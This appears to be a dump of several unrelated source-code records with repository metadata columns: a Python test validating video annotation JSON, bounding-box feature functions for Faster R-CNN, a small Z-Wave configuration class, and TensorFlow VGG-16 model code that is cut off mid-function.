"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.9,
"y1": 48.35,
"x2": 283.59,
"y2": 146.56
},
"timestamp": 19725864,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 52.46,
"x2": 283.18,
"y2": 150.67
},
"timestamp": 20271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 181.49,
"y1": 63.7,
"x2": 283.18,
"y2": 161.91
},
"timestamp": 21271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 72.76,
"x2": 283.76,
"y2": 170.97
},
"timestamp": 22271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.07,
"y1": 81.51,
"x2": 283.76,
"y2": 179.72
},
"timestamp": 23271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 24271058,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"points": {
"x1": 182.42,
"y1": 97.19,
"x2": 284.11,
"y2": 195.4
},
"timestamp": 30526667,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": {
"type": "bbox",
"classId": 859496,
"className": "vid",
"start": 29713736,
"end": 30526667
},
"parameters": [
{
"start": 29713736,
"end": 30526667,
"timestamps": [
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 29713736,
"attributes": []
},
{
"points": {
"x1": 132.82,
"y1": 129.12,
"x2": 175.16,
"y2": 188
},
"timestamp": 30526667,
"attributes": []
}
]
}
]
},
{
"meta": {
"type": "event",
"classId": 859496,
"className": "vid",
"start": 5528212,
"end": 7083022,
"pointLabels": {}
},
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": "7083022",
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"parameters": [
{
"start": 5528212,
"end": 7083022,
"timestamps": [
{
"timestamp": 5528212,
"attributes": []
},
{
"timestamp": 6702957,
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
},
{
"timestamp": "7083022",
"attributes": [
{
"id": 1175876,
"groupId": 338357,
"name": "attr",
"groupName": "attr g"
}
]
}
]
}
]
},
{
"meta": "afsdfadsf"
},
{
"meta" : []
}
],
"tags": [
123
]
}
'''
)
with catch_prints() as out:
sa.validate_annotations("Video", os.path.join(self.vector_folder_path,
f"{tmpdir_name}/test_validate_video_point_labels_bad_keys.json"))
self.assertEqual(
"instances[0].meta.pointLabels.bad_key_1doesnotmatchexpectedformat^[0-9]+$\ninstances[0].meta.pointLabels.bad_key_2doesnotmatchexpectedformat^[0-9]+$\ninstances[0].meta.pointLabels.doesnotmatchexpectedformat^[0-9]+$\ninstances[0].meta.pointLabels.1strtypeexpected\ninstances[2].meta.pointLabelsextrafieldsnotpermitted\ninstances[2].parameters[0].timestamps[2].timestampintegertypeexpected\ninstances[3].metafieldrequired\ninstances[4].metavalueisnotavaliddict\ninstances[5].metavalueisnotavaliddict\ntags[0]strtypeexpected",
out.getvalue().strip().replace(" ", ""))
| 51.041339
| 544
| 0.221567
| 4,304
| 103,716
| 5.182388
| 0.093169
| 0.036046
| 0.042591
| 0.058283
| 0.91002
| 0.883389
| 0.858373
| 0.846581
| 0.820534
| 0.794082
| 0
| 0.12345
| 0.702196
| 103,716
| 2,031
| 545
| 51.06647
| 0.598698
| 0
| 0
| 0.484848
| 0
| 0.013468
| 0.335666
| 0.203917
| 0
| 0
| 0
| 0
| 0.074074
| 1
| 0.084175
| false
| 0
| 0.03367
| 0.006734
| 0.148148
| 0.043771
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
541f563557f6ecd72d9f9322643666a415388f59
| 8,112
|
py
|
Python
|
branch1/lib/model/rpn/edge_box_layer_tf.py
|
ChengZY/Train_Defect_Detection
|
2e9dc0e63c04f4fddb599b4d473bd509c4acf021
|
[
"MIT"
] | 23
|
2019-02-08T01:40:08.000Z
|
2022-03-18T02:22:22.000Z
|
branch1/lib/model/rpn/edge_box_layer_tf.py
|
ChengZY/Train_Defect_Detection
|
2e9dc0e63c04f4fddb599b4d473bd509c4acf021
|
[
"MIT"
] | null | null | null |
branch1/lib/model/rpn/edge_box_layer_tf.py
|
ChengZY/Train_Defect_Detection
|
2e9dc0e63c04f4fddb599b4d473bd509c4acf021
|
[
"MIT"
] | 4
|
2019-02-12T07:46:13.000Z
|
2021-08-31T04:59:47.000Z
|
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Sean Bell
# --------------------------------------------------------
import numpy as np
import math
import torch
DEBUG = False  # module-wide debug switch; nothing in this chunk reads it — presumably toggled by hand during development
def cal_iou(box, truth):
    """Return the intersection-over-union of two boxes.

    Each box is an indexable of at least 5 elements laid out as
    ``[_, x1, y1, x2, y2]`` — the coordinate values live at indices 1-4.
    Widths/heights use the inclusive-pixel convention (``+ 1``).
    Note: raises ZeroDivisionError when both boxes have zero union area,
    matching the original implementation.
    """
    inter_x1 = max(box[1], truth[1])
    inter_y1 = max(box[2], truth[2])
    inter_x2 = min(box[3], truth[3])
    inter_y2 = min(box[4], truth[4])

    inter_w = inter_x2 - inter_x1 + 1
    inter_h = inter_y2 - inter_y1 + 1
    # Non-overlapping boxes produce a negative extent -> zero intersection.
    inter_area = inter_w * inter_h if inter_w >= 0 and inter_h >= 0 else 0

    area_sum = ((box[3] - box[1] + 1) * (box[4] - box[2] + 1)
                + (truth[3] - truth[1] + 1) * (truth[4] - truth[2] + 1))
    return inter_area * 1.0 / (area_sum - inter_area)
def edge_box_layer(rois, im_info):
    """Build pairwise geometric "edge" features between every ordered pair of RoIs.

    Args:
        rois: tensor-like of shape (1, n, 5); each row is ``[_, x1, y1, x2, y2]``
            with coordinates at indices 1-4 (same layout ``cal_iou`` uses).
            Only ``.size()`` and ``.tolist()`` are required of it.
        im_info: tensor-like of shape (1, k); the first two entries are used as
            the image extents for normalisation — TODO confirm (width, height)
            ordering against the caller.

    Returns:
        ``np.float32`` array of shape (n*n, 12). For each ordered pair (i, j)
        with IoU < 0.6 a 12-dim geometric feature vector; a zero row otherwise
        (including the diagonal i == j, which is forced to IoU 1.0).

    BUGFIX: the original computed feature 9 as ``pow((cy2 - cy2) / (h2 + 1), 2)``,
    which is identically zero; by symmetry with feature 8 (the cx term) it must
    be ``(cy1 - cy2)``.
    """
    n_boxes = rois.size()[1]
    boxes = rois.tolist()[0]
    info = im_info.tolist()[0]
    norm_w = info[0] + 1  # +1 guards against division by zero on degenerate extents
    norm_h = info[1] + 1

    def _iou(a, b):
        # Local copy of cal_iou so this function is self-contained.
        w = min(a[3], b[3]) - max(a[1], b[1]) + 1
        h = min(a[4], b[4]) - max(a[2], b[2]) + 1
        inter = w * h if w >= 0 and h >= 0 else 0
        outer = ((a[3] - a[1] + 1) * (a[4] - a[2] + 1)
                 + (b[3] - b[1] + 1) * (b[4] - b[2] + 1))
        return inter * 1.0 / (outer - inter)

    union_boxes = []
    for i in range(n_boxes):
        # Geometry of box i is loop-invariant over j — hoisted out of the inner loop.
        cx1 = (boxes[i][1] + boxes[i][3]) * 0.5
        cy1 = (boxes[i][2] + boxes[i][4]) * 0.5
        w1 = max((boxes[i][3] - boxes[i][1]) * 1.0, 0)
        h1 = max((boxes[i][4] - boxes[i][2]) * 1.0, 0)
        s1 = w1 * h1
        for j in range(n_boxes):
            iou = 1.0 if i == j else _iou(boxes[i], boxes[j])
            if iou >= 0.6:
                # Heavily-overlapping (or identical) pairs carry no edge feature.
                union_boxes.append([0] * 12)
                continue
            cx2 = (boxes[j][1] + boxes[j][3]) * 0.5
            cy2 = (boxes[j][2] + boxes[j][4]) * 0.5
            w2 = max((boxes[j][3] - boxes[j][1]) * 1.0, 0)
            h2 = max((boxes[j][4] - boxes[j][2]) * 1.0, 0)
            s2 = w2 * h2
            dx = (cx1 - cx2) / (w2 + 1)
            dy = (cy1 - cy2) / (h2 + 1)
            union_boxes.append([
                w1 / norm_w,
                h1 / norm_h,
                s1 / (norm_w * norm_h),
                w2 / norm_w,
                h2 / norm_h,
                s2 / (norm_w * norm_h),
                dx,
                dy,
                dx ** 2,
                dy ** 2,  # BUGFIX: was pow((cy2 - cy2) / (h2 + 1), 2) == 0
                math.log((w1 + 1) / (w2 + 1)),
                math.log((h1 + 1) / (h2 + 1)),
            ])
    return np.array(union_boxes).astype(np.float32)
def edge_whole_layer(rois, im_info):
    """Compute geometric edge features relating each RoI to the whole image.

    Args:
        rois: tensor of shape (1, n_boxes, 5); each row is
            (batch_idx, x1, y1, x2, y2).
        im_info: tensor of shape (1, >=2); the first two entries are used as
            the image width and height here -- NOTE(review): many detection
            codebases store im_info as (height, width); confirm the caller's
            convention.

    Returns:
        np.ndarray of shape (n_boxes, 9), float32.  Per RoI: normalized
        width, height, area, center offset to the image center (x, y),
        squared offsets, and log size ratios vs. the image.
    """
    n_boxes = rois.size()[1]  # e.g. 128 or 256 proposals
    rois = rois.tolist()[0]
    im_info = im_info.tolist()[0]
    # "Box 2" is the whole image (assumed non-negative dimensions).
    img_w = im_info[0] * 1.0
    img_h = im_info[1] * 1.0
    cx2 = img_w * 0.5
    cy2 = img_h * 0.5
    union_boxes = []
    for i in range(n_boxes):
        roi = rois[i]
        cx1 = (roi[1] + roi[3]) * 0.5
        cy1 = (roi[2] + roi[4]) * 0.5
        # Clamp degenerate (inverted) boxes to zero size.
        w1 = max((roi[3] - roi[1]) * 1.0, 0)
        h1 = max((roi[4] - roi[2]) * 1.0, 0)
        s1 = w1 * h1
        box = [
            w1 / (img_w + 1),
            h1 / (img_h + 1),
            s1 / ((img_w + 1) * (img_h + 1)),
            (cx1 - cx2) / (img_w + 1),
            (cy1 - cy2) / (img_h + 1),
            pow((cx1 - cx2) / (img_w + 1), 2),
            # BUGFIX: the original computed pow((cy2 - cy2) / (h2 + 1), 2),
            # which is identically 0; the intended feature is the squared
            # y-offset, matching edge_whole_layer_0 below.
            pow((cy1 - cy2) / (img_h + 1), 2),
            math.log((w1 + 1) / (img_w + 1)),
            math.log((h1 + 1) / (img_h + 1)),
        ]
        union_boxes.append(box)
    return np.array(union_boxes).astype(np.float32)
def edge_whole_layer_0(rois, im_info):
    """Build per-RoI geometric features against the whole image.

    ``rois`` is an (n, 5) tensor of (batch_idx, x1, y1, x2, y2) rows and
    ``im_info`` a (1, >=2) tensor whose first two entries give the image
    extent.  Returns an (n, 9) float32 numpy array of normalized size,
    area, center-offset, squared-offset and log-ratio features.
    """
    num_boxes = rois.size()[0]  # 128, 256
    roi_list = rois.tolist()
    info = im_info.tolist()[0]
    # The reference "box" is the full image.
    img_cx = info[0] * 0.5
    img_cy = info[1] * 0.5
    img_w = max(info[0] * 1.0, 0)
    img_h = max(info[1] * 1.0, 0)
    features = []
    for idx in range(num_boxes):
        x1, y1, x2, y2 = roi_list[idx][1:5]
        cx = (x1 + x2) * 0.5
        cy = (y1 + y2) * 0.5
        # Degenerate boxes collapse to zero width/height.
        w = max((x2 - x1) * 1.0, 0)
        h = max((y2 - y1) * 1.0, 0)
        area = w * h
        features.append([
            w / (info[0] + 1),
            h / (info[1] + 1),
            area / ((info[0] + 1) * (info[1] + 1)),
            (cx - img_cx) / (img_w + 1),
            (cy - img_cy) / (img_h + 1),
            pow((cx - img_cx) / (img_w + 1), 2),
            pow((cy - img_cy) / (img_h + 1), 2),
            math.log((w + 1) / (img_w + 1)),
            math.log((h + 1) / (img_h + 1)),
        ])
    return np.array(features).astype(np.float32)
| 30.156134
| 107
| 0.425419
| 1,211
| 8,112
| 2.76796
| 0.099917
| 0.073091
| 0.062649
| 0.023866
| 0.856205
| 0.855012
| 0.844869
| 0.844869
| 0.844869
| 0.844869
| 0
| 0.100173
| 0.357618
| 8,112
| 269
| 108
| 30.156134
| 0.543082
| 0.302268
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027586
| false
| 0
| 0.02069
| 0
| 0.075862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
548ad8d1602e22cc0e7021f926b86a1f2ed09a21
| 199
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_RU_validation_testing.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_RU_validation_testing.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_RU_validation_testing.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from ..nerio.z_wave_RU_validation_testing import z_wave_RU_validation_testing as z_wave_RU_validation_testing_nerio
class z_wave_RU_validation_testing(z_wave_RU_validation_testing_nerio):
    """Nixi-part Z-Wave RU validation-testing profile.

    Inherits everything unchanged from the nerio implementation; the
    subclass presumably exists only to expose the same profile under this
    part's package -- TODO(review): confirm against the configurator's
    part-discovery mechanism.
    """
    pass
| 33.166667
| 115
| 0.894472
| 33
| 199
| 4.727273
| 0.333333
| 0.160256
| 0.224359
| 0.544872
| 0.833333
| 0.371795
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075377
| 199
| 5
| 116
| 39.8
| 0.847826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
54a017f3920cf3cbd410463750a17c09b3e238fa
| 15
|
py
|
Python
|
code/sample_2-1-12.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | 1
|
2022-03-29T13:50:12.000Z
|
2022-03-29T13:50:12.000Z
|
code/sample_2-1-12.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
code/sample_2-1-12.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
# Evaluate and print 10**9 + 7 (= 1000000007).
print(10**9+7)
| 7.5
| 14
| 0.6
| 4
| 15
| 2.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 0.066667
| 15
| 1
| 15
| 15
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
54c58fff4207eabc7238b8cfa5cd0ae1acd75357
| 99,923
|
py
|
Python
|
tools/model_vgg.py
|
abenbihi/elf
|
fb63b7ca316a4da93e75421abbb05663d1c5fe7e
|
[
"BSD-2-Clause"
] | 25
|
2019-08-30T06:39:47.000Z
|
2021-11-22T12:32:32.000Z
|
tools/model_vgg.py
|
abenbihi/elf
|
fb63b7ca316a4da93e75421abbb05663d1c5fe7e
|
[
"BSD-2-Clause"
] | 10
|
2019-12-13T02:16:18.000Z
|
2022-02-09T23:31:05.000Z
|
tools/model_vgg.py
|
abenbihi/elf
|
fb63b7ca316a4da93e75421abbb05663d1c5fe7e
|
[
"BSD-2-Clause"
] | 6
|
2019-08-15T16:02:17.000Z
|
2021-11-24T11:57:10.000Z
|
"""
- network model
- loss
- optimizer
- summary
"""
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import re
import sys
import tarfile
from six.moves import urllib
import tensorflow as tf
from math import sqrt
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import array_ops
# TF1-style global container holding command-line flags defined elsewhere.
FLAGS = tf.app.flags.FLAGS
@ops.RegisterGradient("MaxPoolGradWithArgmax")
def _MaxPoolGradGradWithArgmax(op, grad):
    """Gradient function registered for MaxPoolGradWithArgmax.

    Returns zeros for the two value inputs and the second-order max-pool
    gradient (routed through the stored argmax indices) for the incoming
    gradient.  The prints trace graph construction.
    """
    print(len(op.outputs))
    print(len(op.inputs))
    print(op.name)
    orig_input = op.inputs[0]
    orig_output = op.inputs[1]
    zeros_like_input = array_ops.zeros(
        shape=array_ops.shape(orig_input), dtype=orig_input.dtype)
    zeros_like_output = array_ops.zeros(
        shape=array_ops.shape(orig_output), dtype=orig_output.dtype)
    grad_grad = gen_nn_ops._max_pool_grad_grad_with_argmax(
        orig_input,
        grad,
        op.inputs[2],
        op.get_attr("ksize"),
        op.get_attr("strides"),
        padding=op.get_attr("padding"))
    return (zeros_like_input, zeros_like_output, grad_grad)
def _model_conv(scope_name, inputs, filters, bn, relu, is_training, reuse):
    """One VGG 3x3 'same'-padded conv layer with optional BN and ReLU."""
    with tf.variable_scope(scope_name, reuse=reuse):
        out = tf.layers.conv2d(
            inputs=inputs, filters=filters, kernel_size=(3, 3),
            padding="same",
            kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            out = tf.contrib.layers.batch_norm(
                out, fused=True, decay=0.9, is_training=is_training)
        if relu:
            out = tf.nn.relu(out)
    return out


def model(images, is_training, reuse=False):
    """VGG-16 convolutional feature extractor (no fully-connected head).

    The original body repeated the same conv-block boilerplate 13 times
    with unused ``scope`` locals and a redundant duplicate assignment of
    ``feat['pool3']``; it is decomposed here into ``_model_conv``.

    Args:
        images: input image batch (NHWC tensor).
        is_training: forwarded to batch-norm; has no effect while ``bn``
            is hard-coded off below.
        reuse: reuse previously-created variables (for a second tower).

    Returns:
        (feat, grads_dict): ``feat`` maps every layer name ('conv1_1' ...
        'pool5') to its tensor; ``grads_dict`` is returned empty.
    """
    print('inference::input', images.get_shape())
    bn = False    # batch-norm disabled in this variant
    relu = False  # raw conv outputs (no activation) in this variant
    feat, grads_dict = {}, {}

    def _pool(x):
        # 2x2 stride-2 VALID max-pool between VGG stages.
        return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
                              padding='VALID', name='pool')

    # Stage 1: 2 x conv64 + pool.
    conv1_1 = _model_conv('conv1_1', images, 64, bn, relu, is_training, reuse)
    print('conv1_1', conv1_1.get_shape())
    conv1_2 = _model_conv('conv1_2', conv1_1, 64, bn, relu, is_training, reuse)
    pool1 = _pool(conv1_2)
    print('pool1', pool1.get_shape())

    # Stage 2: 2 x conv128 + pool.
    conv2_1 = _model_conv('conv2_1', pool1, 128, bn, relu, is_training, reuse)
    print('conv2_1', conv2_1.get_shape())
    conv2_2 = _model_conv('conv2_2', conv2_1, 128, bn, relu, is_training, reuse)
    pool2 = _pool(conv2_2)
    print('pool2', pool2.get_shape())

    # Stage 3: 3 x conv256 + pool.
    conv3_1 = _model_conv('conv3_1', pool2, 256, bn, relu, is_training, reuse)
    print('conv3_1', conv3_1.get_shape())
    conv3_2 = _model_conv('conv3_2', conv3_1, 256, bn, relu, is_training, reuse)
    print('conv3_2', conv3_2.get_shape())
    conv3_3 = _model_conv('conv3_3', conv3_2, 256, bn, relu, is_training, reuse)
    pool3 = _pool(conv3_3)
    print('pool3', pool3.get_shape())

    # Stage 4: 3 x conv512 + pool.
    conv4_1 = _model_conv('conv4_1', pool3, 512, bn, relu, is_training, reuse)
    print('conv4_1', conv4_1.get_shape())
    conv4_2 = _model_conv('conv4_2', conv4_1, 512, bn, relu, is_training, reuse)
    print('conv4_2', conv4_2.get_shape())
    conv4_3 = _model_conv('conv4_3', conv4_2, 512, bn, relu, is_training, reuse)
    pool4 = _pool(conv4_3)
    print('pool4', pool4.get_shape())

    # Stage 5: 3 x conv512 + pool.
    conv5_1 = _model_conv('conv5_1', pool4, 512, bn, relu, is_training, reuse)
    print('conv5_1', conv5_1.get_shape())
    conv5_2 = _model_conv('conv5_2', conv5_1, 512, bn, relu, is_training, reuse)
    print('conv5_2', conv5_2.get_shape())
    conv5_3 = _model_conv('conv5_3', conv5_2, 512, bn, relu, is_training, reuse)
    pool5 = _pool(conv5_3)
    print('pool5', pool5.get_shape())

    # Expose every intermediate activation by name.
    for name, tensor in (
            ('conv1_1', conv1_1), ('conv1_2', conv1_2), ('pool1', pool1),
            ('conv2_1', conv2_1), ('conv2_2', conv2_2), ('pool2', pool2),
            ('conv3_1', conv3_1), ('conv3_2', conv3_2), ('conv3_3', conv3_3),
            ('pool3', pool3),
            ('conv4_1', conv4_1), ('conv4_2', conv4_2), ('conv4_3', conv4_3),
            ('pool4', pool4),
            ('conv5_1', conv5_1), ('conv5_2', conv5_2), ('conv5_3', conv5_3),
            ('pool5', pool5)):
        feat[name] = tensor
    return feat, grads_dict
def _grad_tower_conv(scope_name, inputs, filters, bn, relu, is_training, reuse):
    """One VGG 3x3 'same'-padded conv layer with optional BN and ReLU."""
    with tf.variable_scope(scope_name, reuse=reuse):
        out = tf.layers.conv2d(
            inputs=inputs, filters=filters, kernel_size=(3, 3),
            padding="same",
            kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            out = tf.contrib.layers.batch_norm(
                out, fused=True, decay=0.9, is_training=is_training)
        if relu:
            out = tf.nn.relu(out)
    return out


def model_grad(images, is_training=False, reuse=False):
    """VGG-16 conv tower (with ReLU) returning pooled features and the
    gradient of pool2 w.r.t. the input images.

    The original body repeated identical conv-block boilerplate 13 times;
    it also contained a large ``if SOBEL:`` section with ``SOBEL = (0==1)``
    (always False) that referenced undefined names ``sobel_x``/``sobel_y``,
    plus an unused ``argmax`` dict -- that unreachable dead code has been
    removed.

    Args:
        images: [batch_size, H, W, C] input tensor.
        is_training: True in training mode (only relevant for batch-norm,
            which is hard-coded off below).
        reuse: reuse variables for a second tower; also silences the
            construction-time shape prints.

    Returns:
        (feat, grads_dict): ``feat`` maps 'pool1'..'pool5' to the pooled
        activations; ``grads_dict['pool2']`` is tf.gradients of pool2
        w.r.t. ``images``, weighted by pool2 itself.
    """
    if not reuse:
        print('inference::input', images.get_shape())
    bn = False   # batch-norm disabled
    relu = True  # standard VGG ReLU activations
    grads_dict = {}
    feat = {}

    def _pool(x):
        # 2x2 stride-2 VALID max-pool between VGG stages.
        return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
                              padding='VALID', name='pool')

    def _report(name, tensor):
        # Shape prints only for the first (non-reuse) tower.
        if not reuse:
            print(name, tensor.get_shape())

    conv1_1 = _grad_tower_conv('conv1_1', images, 64, bn, relu, is_training, reuse)
    _report('conv1_1', conv1_1)
    conv1_2 = _grad_tower_conv('conv1_2', conv1_1, 64, bn, relu, is_training, reuse)
    pool1 = _pool(conv1_2)
    _report('pool1', pool1)
    conv2_1 = _grad_tower_conv('conv2_1', pool1, 128, bn, relu, is_training, reuse)
    _report('conv2_1', conv2_1)
    conv2_2 = _grad_tower_conv('conv2_2', conv2_1, 128, bn, relu, is_training, reuse)
    pool2 = _pool(conv2_2)
    _report('pool2', pool2)
    conv3_1 = _grad_tower_conv('conv3_1', pool2, 256, bn, relu, is_training, reuse)
    _report('conv3_1', conv3_1)
    conv3_2 = _grad_tower_conv('conv3_2', conv3_1, 256, bn, relu, is_training, reuse)
    _report('conv3_2', conv3_2)
    conv3_3 = _grad_tower_conv('conv3_3', conv3_2, 256, bn, relu, is_training, reuse)
    pool3 = _pool(conv3_3)
    _report('pool3', pool3)
    conv4_1 = _grad_tower_conv('conv4_1', pool3, 512, bn, relu, is_training, reuse)
    _report('conv4_1', conv4_1)
    conv4_2 = _grad_tower_conv('conv4_2', conv4_1, 512, bn, relu, is_training, reuse)
    _report('conv4_2', conv4_2)
    conv4_3 = _grad_tower_conv('conv4_3', conv4_2, 512, bn, relu, is_training, reuse)
    pool4 = _pool(conv4_3)
    _report('pool4', pool4)
    conv5_1 = _grad_tower_conv('conv5_1', pool4, 512, bn, relu, is_training, reuse)
    _report('conv5_1', conv5_1)
    conv5_2 = _grad_tower_conv('conv5_2', conv5_1, 512, bn, relu, is_training, reuse)
    _report('conv5_2', conv5_2)
    conv5_3 = _grad_tower_conv('conv5_3', conv5_2, 512, bn, relu, is_training, reuse)
    pool5 = _pool(conv5_3)
    _report('pool5', pool5)

    # Gradient of pool2 w.r.t. the input image, weighted by pool2 itself
    # (the only gradient the original left enabled).
    grads_dict['pool2'] = tf.gradients(pool2, images, pool2)

    feat['pool1'] = pool1
    feat['pool2'] = pool2
    feat['pool3'] = pool3
    feat['pool4'] = pool4
    feat['pool5'] = pool5
    return feat, grads_dict
def small_model_grad(images, sobel_x, sobel_y, is_training=False, reuse=False):
""" Network model
Args:
images: [batch)size, H, W, C]
is_training: True if traning mode (for batchnorm)
"""
if not reuse:
print('inference::input', images.get_shape())
bn = False
grads_dict = {}
argmax = {}
feat = {}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
conv1_1 = tf.nn.relu(conv1_1)
if not reuse:
print('conv1_1', conv1_1.get_shape())
##grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
conv1_2 = tf.nn.relu(conv1_2)
pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
#pool1,argmax['pool1'] = tf.nn.max_pool_with_argmax(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
if not reuse:
print('pool1', pool1.get_shape())
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#feat['pool1'] = pool1
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
conv2_1 = tf.nn.relu(conv2_1)
if not reuse:
print('conv2_1', conv2_1.get_shape())
#grads_dict['conv2_1'] = tf.gradients(conv2_1, images, conv2_1)
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
#pool2, argmax['pool2'] = tf.nn.max_pool_with_argmax(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
if not reuse:
